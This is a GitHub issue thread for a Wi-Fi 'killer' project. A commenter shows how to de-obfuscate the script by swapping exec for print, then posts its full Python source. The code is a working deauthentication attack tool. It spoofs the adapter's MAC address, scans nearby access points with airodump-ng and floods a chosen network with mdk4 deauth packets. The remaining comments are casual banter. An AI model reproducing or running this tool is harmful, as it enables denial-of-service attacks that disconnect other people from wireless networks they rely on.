### ISSUE TITLE
nice criptography, but...

### ISSUE THREAD

**Issue by Jeanpseven** [0xbitx/Dedsec-Wifi-Killer#1]
It could be better if there was no encryption. I'm wasting my time trying to decrypt it. I wanted to make some upgrades to these scripts. Maybe we could even work together, our creations are similar.

**Comment by x01-dz** [comment]
#Change exec to print and well done haha
'''
import os, sys
import time
from tabulate import tabulate
from termcolor import colored
from subprocess import Popen
import psutil
import csv
import random

home = os.getcwd()
scanned_path = home+'/.info'
DN = open(os.devnull, 'w')
commands = []

if not os.path.exists(scanned_path):
    os.makedirs(scanned_path)

os.chdir(scanned_path)

def check_root():
    os.system('clear')
    if not os.geteuid()==0:
        sys.exit('\nThis script must be run as root!\n')
    else:
        menu()

def banner():
    print(colored('''
         _nnnn_                      
        dGGGGMMb     ,"""""""""""""""""".
       @p~qp~~qMb    | I SEE PISO WIFI  |
       M|@||@) M|   _;..................'
       @,----.JM| -'
      JS^\__/  qKL
     dZP        qKRb
    dZP          qKKb
   fZP            SMMb
   HZM            MMMM
   FqM            MMMM
 __| ".        |\dS"qML
 |    `.       | `' \Zq
_)      \.___.,|     .'
\____   )MMMMMM|   .'
     `-'       `--' 
    ''', 'cyan'))
    print(tabulate([['WIFI KILLER BY 0XBIT']], tablefmt='fancy_grid'))

addrs = psutil.net_if_addrs()
inter = list(addrs.keys())

inter_dict = {}
for i, interface in enumerate(inter, start=1):
    inter_dict[i] = interface


def mon_man_mode(wname, mode):
    mac_address = [random.randint(0x00, 0xff) for _ in range(6)]
    random_mac = ':'.join([f'{x:02x}' for x in mac_address])
    os.system(f'ifconfig {wname} down')
    os.system(f'iwconfig {wname} mode {mode}')
    os.system(f'ifconfig {wname} hw ether {random_mac} > /dev/null 2>&1')
    os.system(f'ifconfig {wname} up')

def show_wifi():
    os.system('clear')
    banner()
    format = []
    header = [colored('WIFI ADAPTER NAME', 'cyan')]
    format.append(header)
    d = 0
    for element in inter:
        d += 1
        wifi_name = str(element)
        format.append([f'{d}. ' + wifi_name])
    print(tabulate(format, tablefmt='fancy_grid'))
    
    try:
        select = int(input('NO: '))
        if select == select:
            global wname
            wname = inter_dict[select]
        else:
            pass
    except KeyError:
        os.system('clear')
        show_wifi()

def scanAP(wname):
    cmd = ['airodump-ng',wname,'-w','scanned','--output-format','csv']
    for i in os.listdir(scanned_path):
        if 'scanned' in i:
            os.remove(i)
    proc_read = Popen(cmd, stdout=DN, stderr=DN)

    while os.path.exists(scanned_path+"/scanned-01.csv") == False:
        continue
    
    attempts_count = 0
    while True:
        try:
            os.system('clear')
            with open(scanned_path+'/scanned-01.csv') as csv_file:
                csv_reader = csv.reader(csv_file, delimiter=',')
                hit_clients = False
                ssid = None
                output_clients = ""
                bssid_list = []
                ssid_list = []
                channel_list = []
                count = -1

                if output_clients == "":
                    attempts_count += 1
                    print(tabulate([[colored('STARTING SCANNING WIFI', 'cyan')]], tablefmt='fancy_grid'))
                    if attempts_count/2 > 15:
                        print(tabulate([[colored('Scanning time exceeded 15sec.', 'cyan')]], tablefmt='fancy_grid'))

                for row in csv_reader:
                    if len(row) < 2:
                        continue
                    if not hit_clients:
                        if row[0].strip() == 'Station MAC':
                            hit_clients = True
                            continue
                        if len(row) < 14:
                            continue
                        if row[0].strip() == 'BSSID':
                            continue
                        enc = row[5].strip()
                        if len(enc) > 4:
                            enc = enc[4:].strip()

                        bssid = row[0].strip()
                        power = str(row[8].strip())
                        channel = str(row[3].strip())
                        ssid = row[13].strip()
                        ssidlen = int(row[12].strip())
                        ssid = ssid[:ssidlen]
                        count += 1
                        if len(ssid) <= 20:
                            output_clients += f"   [{count}] {ssid.ljust(20)} {channel.rjust(3)}  {enc.ljust(4)} {power.rjust(4)}    {bssid.ljust(10)}\n"
                        else:
                            output_clients += f"   [{count}] {ssid[0:17]}... {channel.rjust(3)}  {enc.ljust(4)} {power.rjust(4)}    {bssid.ljust(10)}\n"
                        
                        bssid_list.append(bssid)
                        ssid_list.append(ssid)
                        channel_list.append(channel)

                    else:
                        if len(row) < 6:
                            continue
                if output_clients != "":
                    os.system('clear')
                    print(tabulate([['Press CTRL+C when the target WIFI appears \n', colored('DEDSEC WIFI SCANNER', 'cyan')]], tablefmt='fancy_grid'))
                    print(f'   ___ ____________________  __  ____  _____  _________________')
                    print(f"  |NUM SSID                  CH  ENCR  POWER  BSSID            |")
                    print(f'   ___ ____________________  __  ____  _____  _________________')
                    print(output_clients)
                    print(f'   ___ ____________________  __  ____  _____  _________________')
                csv_file.close()
            time.sleep(0.5)

        except KeyboardInterrupt:
            if ssid is None:
                os.system('clear')
                print(tabulate([[colored("Couldn't catch any WIFI", 'cyan')]], tablefmt='fancy_grid'))
                time.sleep(2)
            else:
                selectAP(proc_read, output_clients, bssid_list, ssid_list, channel_list)
            break

def selectAP(proc_read, output_clients, bssid_list, ssid_list, channel_list):
    proc_read.kill()
    os.system('stty sane')
    os.system('clear')
    while True:
        try:
            banner()
            print(f'   ___ ____________________  __  ____  _____  _________________')
            print(f"  |NUM SSID                  CH  ENCR  POWER  BSSID            |")
            print(f'   ___ ____________________  __  ____  _____  _________________')
            print(output_clients)
            print(f'   ___ ____________________  __  ____  _____  _________________')
            target_id = input(f"   NO: ")
            target_id = int(target_id)
            target_bssid = bssid_list[target_id]
            target_ssid = ssid_list[target_id]
            target_channel = channel_list[target_id]
            os.system('clear')
            attack(target_bssid, target_ssid, target_channel, wname)
            break
        except KeyboardInterrupt:
            break

def attack(target_bssid, target_ssid, target_channel, wname):
    try:
        os.system('clear')
        print()
        print(tabulate([[colored(f'Starting Deauthentication attack for {target_ssid} ({target_bssid}) on channel {target_channel}', 'cyan')]],tablefmt='fancy_grid'))
        print(f' Press CTRL+C to STOP\n')
        print(f'    [+] sending deauth packets {target_bssid} on channel {target_channel}')
        cmd = f'mdk4 {wname} d -c {target_channel} -B {target_bssid}'
        os.popen(cmd).read()
    except KeyboardInterrupt:
        os.system('clear')
        mon_man_mode(wname, 'managed')
        os.system('service networking restart')
        menu()

def menu():
    banner()
    print(tabulate([['1. ATTACK', '2. ' + colored('EXIT', 'red')]], tablefmt='fancy_grid'))
    select = int(input('root@dedsec: '))
    if select == 1:
        show_wifi()
        scanAP(wname)
    elif select == 2:
        os.system('clear')
        sys.exit('BYE BYE')

check_root()
'''

**Comment by Jeanpseven** [comment]
Thanks for replying 0xbitx, I tried to use your own decrypt script but it
printed an error, by the way the organization of the code is fine

Você parou de postar por um tempo,ficarei feliz se voltar

Em qua., 19 de jul. de 2023 10:22, x01-dz ***@***.***>
escreveu:

**Comment by Jeanpseven** [comment]
So it was just changing exec to print???? Holy Lulz

Em qua., 19 de jul. de 2023 10:22, x01-dz ***@***.***>
escreveu:

**Comment by x01-dz** [comment]
If you are a real programmer you can understand it, I am x01-dz ex-malware analyst

**Comment by Jeanpseven** [comment]
thank you for sharing this knowledge

**Comment by Jeanpseven** [comment]
thank you for sharing this knowledge

**Comment by 0xbitx** [comment]
that's the basic obs for scriptkid lol

**Comment by Jeanpseven** [comment]
Ew bro
